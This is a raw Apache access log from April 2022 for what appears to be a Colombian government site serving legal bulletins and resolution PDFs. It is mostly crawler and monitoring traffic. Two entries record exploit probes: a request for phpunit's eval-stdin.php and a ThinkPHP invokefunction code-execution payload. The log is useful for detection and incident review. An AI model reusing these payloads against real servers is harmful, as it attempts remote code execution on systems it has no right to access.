216.245.221.92 - - [11/Apr/2022:02:57:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:03:00:44 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%207%20del%2008%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 972955
172.22.2.4 - - [11/Apr/2022:02:59:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:03:00:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58588
216.245.221.92 - - [11/Apr/2022:03:02:33 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.13 - - [11/Apr/2022:03:03:02 -0500] "-" 408 -
34.141.153.109 - - [11/Apr/2022:03:03:34 -0500] "GET / HTTP/1.1" 200 319
207.46.13.209 - - [11/Apr/2022:03:07:08 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [11/Apr/2022:03:05:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [11/Apr/2022:03:07:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:03:06:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55877
216.245.221.92 - - [11/Apr/2022:03:12:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:03:11:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:03:12:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58588
207.46.13.157 - - [11/Apr/2022:03:15:28 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
40.77.167.46 - - [11/Apr/2022:03:16:30 -0500] "GET /bla/resoluciones/resoluciones%202016/0925.pdf HTTP/1.1" 200 340347
66.249.65.13 - - [11/Apr/2022:03:17:25 -0500] "-" 408 -
216.245.221.92 - - [11/Apr/2022:03:17:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:03:17:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:03:18:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
216.245.221.92 - - [11/Apr/2022:03:22:33 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [11/Apr/2022:03:22:50 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45438
201.245.192.253 - - [11/Apr/2022:03:23:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45431
172.22.2.4 - - [11/Apr/2022:03:23:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:03:24:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52945
216.245.221.92 - - [11/Apr/2022:03:27:33 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.157 - - [11/Apr/2022:03:28:39 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 342490
172.22.2.4 - - [11/Apr/2022:03:29:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [11/Apr/2022:03:29:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:03:29:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56300
172.22.2.4 - - [11/Apr/2022:03:31:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
216.245.221.92 - - [11/Apr/2022:03:32:33 -0500] "HEAD / HTTP/1.1" 200 -
49.7.21.74 - - [11/Apr/2022:03:33:12 -0500] "-" 408 -
201.245.192.253 - - [11/Apr/2022:03:32:50 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45438
201.245.192.253 - - [11/Apr/2022:03:33:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45431
66.249.65.13 - - [11/Apr/2022:03:36:21 -0500] "-" 408 -
172.22.2.4 - - [11/Apr/2022:03:34:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:03:35:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59688
216.245.221.92 - - [11/Apr/2022:03:37:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:03:40:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [11/Apr/2022:03:42:33 -0500] "HEAD / HTTP/1.1" 200 -
173.252.107.12 - - [11/Apr/2022:03:43:10 -0500] "GET /incautadas-tarantulas-que-iban-a-ser-exportadas-ilegalmente-desde-bogota-hasta-mexico.html HTTP/1.1" 206 899
172.22.2.4 - - [11/Apr/2022:03:41:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61416
201.245.192.253 - - [11/Apr/2022:03:42:50 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45438
201.245.192.253 - - [11/Apr/2022:03:43:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45431
35.195.93.98 - - [11/Apr/2022:03:46:56 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [11/Apr/2022:03:47:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:03:46:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:03:47:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
207.46.13.43 - - [11/Apr/2022:03:49:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/0974.pdf HTTP/1.1" 200 2089032
207.46.13.157 - - [11/Apr/2022:03:49:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/3019.pdf HTTP/1.1" 200 352592
66.249.65.13 - - [11/Apr/2022:03:50:18 -0500] "-" 408 -
216.245.221.92 - - [11/Apr/2022:03:52:33 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.209 - - [11/Apr/2022:03:53:51 -0500] "GET /galeria/bibloteca/contentflow.js HTTP/1.1" 200 42804
172.22.2.4 - - [11/Apr/2022:03:52:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:03:53:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61416
207.46.13.179 - - [11/Apr/2022:03:57:27 -0500] "GET /bla/resoluciones/resoluciones%202016/2361.pdf HTTP/1.1" 200 393665
216.245.221.92 - - [11/Apr/2022:03:57:33 -0500] "HEAD / HTTP/1.1" 200 -
118.184.177.28 - - [11/Apr/2022:03:58:07 -0500] "GET / HTTP/1.1" 200 319
207.46.13.209 - - [11/Apr/2022:03:58:53 -0500] "GET /bla/resoluciones/resoluciones%202016/1121.pdf HTTP/1.1" 200 247796
172.22.2.4 - - [11/Apr/2022:03:58:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
200.29.113.38 - - [11/Apr/2022:04:00:42 -0500] "GET /en-semana-santa-no-uses-palmas-ni-traigas-o-consumas-animales-silvestres.html HTTP/1.1" 200 959
172.22.2.4 - - [11/Apr/2022:03:59:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58588
40.77.167.78 - - [11/Apr/2022:04:01:41 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [11/Apr/2022:04:02:33 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.13 - - [11/Apr/2022:04:05:35 -0500] "-" 408 -
172.22.2.4 - - [11/Apr/2022:04:04:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:04:04:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
40.77.167.46 - - [11/Apr/2022:04:07:15 -0500] "GET /BLA/resoluciones/AUTOS%202018/2799.pdf HTTP/1.1" 304 -
172.22.2.4 - - [11/Apr/2022:04:07:28 -0500] "GET /BLA/boletinlegal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
216.245.221.92 - - [11/Apr/2022:04:07:33 -0500] "HEAD / HTTP/1.1" 200 -
40.77.188.74 - - [11/Apr/2022:04:09:54 -0500] "GET /galeria/bibloteca/contentflow.css HTTP/1.1" 200 3201
40.77.189.149 - - [11/Apr/2022:04:09:54 -0500] "GET /galeria/bibloteca/mycontentflow.css HTTP/1.1" 200 3110
40.77.190.91 - - [11/Apr/2022:04:09:54 -0500] "GET /galeria/bibloteca/ContentFlowAddOn_white.js HTTP/1.1" 200 2497
207.46.13.209 - - [11/Apr/2022:04:09:55 -0500] "GET /bla/resoluciones/resoluciones%202016/2543.pdf HTTP/1.1" 200 733477
40.77.190.51 - - [11/Apr/2022:04:09:55 -0500] "GET /galeria/bibloteca/ContentFlowAddOn_white.css HTTP/1.1" 200 3355
49.7.21.74 - - [11/Apr/2022:04:10:51 -0500] "-" 408 -
172.22.2.4 - - [11/Apr/2022:04:09:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:04:10:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55877
216.245.221.92 - - [11/Apr/2022:04:12:33 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.157 - - [11/Apr/2022:04:16:23 -0500] "GET /bla/resoluciones/resoluciones%202016/1916.pdf HTTP/1.1" 200 361313
207.46.13.209 - - [11/Apr/2022:04:17:05 -0500] "GET /bla/resoluciones/resoluciones%202016/2536.pdf HTTP/1.1" 200 379853
172.22.2.4 - - [11/Apr/2022:04:15:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [11/Apr/2022:04:17:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:04:16:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
216.245.221.92 - - [11/Apr/2022:04:22:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:04:21:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [11/Apr/2022:04:22:50 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45432
172.22.2.4 - - [11/Apr/2022:04:22:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 44924
40.77.167.46 - - [11/Apr/2022:04:22:25 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 44924
40.77.167.46 - - [11/Apr/2022:04:24:15 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
40.77.167.46 - - [11/Apr/2022:04:24:18 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
207.46.13.43 - - [11/Apr/2022:04:24:19 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
201.245.192.253 - - [11/Apr/2022:04:23:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45282
40.77.167.46 - - [11/Apr/2022:04:24:21 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
216.245.221.92 - - [11/Apr/2022:04:27:33 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.43 - - [11/Apr/2022:04:28:10 -0500] "GET /bla/resoluciones/resoluciones%202016/1771.pdf HTTP/1.1" 200 707668
66.249.65.17 - - [11/Apr/2022:04:28:14 -0500] "-" 408 -
172.22.2.4 - - [11/Apr/2022:04:27:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:04:28:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
216.245.221.92 - - [11/Apr/2022:04:32:33 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [11/Apr/2022:04:32:50 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45432
201.245.192.253 - - [11/Apr/2022:04:33:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45282
172.22.2.4 - - [11/Apr/2022:04:33:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
222.209.14.183 - - [11/Apr/2022:04:35:15 -0500] "GET / HTTP/1.0" 200 319
172.22.2.4 - - [11/Apr/2022:04:34:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
172.22.2.4 - - [11/Apr/2022:04:36:55 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
5.255.253.106 - - [11/Apr/2022:04:37:08 -0500] "-" 408 -
5.255.253.174 - - [11/Apr/2022:04:37:13 -0500] "-" 408 -
5.45.207.133 - - [11/Apr/2022:04:37:20 -0500] "-" 408 -
87.250.224.175 - - [11/Apr/2022:04:37:25 -0500] "-" 408 -
216.245.221.92 - - [11/Apr/2022:04:37:33 -0500] "HEAD / HTTP/1.1" 200 -
87.250.224.4 - - [11/Apr/2022:04:37:40 -0500] "-" 408 -
213.180.203.85 - - [11/Apr/2022:04:37:55 -0500] "-" 408 -
87.250.224.58 - - [11/Apr/2022:04:38:25 -0500] "-" 408 -
172.22.2.4 - - [11/Apr/2022:04:36:56 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 63342
5.255.253.112 - - [11/Apr/2022:04:39:25 -0500] "-" 408 -
207.46.13.179 - - [11/Apr/2022:04:39:30 -0500] "GET /Publicaciones/2022EE23476.pdf HTTP/1.1" 404 227
87.250.224.52 - - [11/Apr/2022:04:40:25 -0500] "-" 408 -
172.22.2.4 - - [11/Apr/2022:04:39:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:04:39:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53344
213.180.203.82 - - [11/Apr/2022:04:42:25 -0500] "-" 408 -
216.245.221.92 - - [11/Apr/2022:04:42:33 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [11/Apr/2022:04:42:50 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45432
201.245.192.253 - - [11/Apr/2022:04:43:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45282
87.250.224.195 - - [11/Apr/2022:04:45:25 -0500] "-" 408 -
172.22.2.4 - - [11/Apr/2022:04:44:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
77.247.181.211 - - [11/Apr/2022:04:47:00 -0500] "GET /POT-2013/Cartografia/Anexo01_Sistema_Hidrico.pdf HTTP/1.1" 200 5860035
172.22.2.4 - - [11/Apr/2022:04:46:27 -0500] "GET /BLA/boletinlegal/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 200 32715
172.22.2.4 - - [11/Apr/2022:04:45:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51717
216.245.221.92 - - [11/Apr/2022:04:47:33 -0500] "HEAD / HTTP/1.1" 200 -
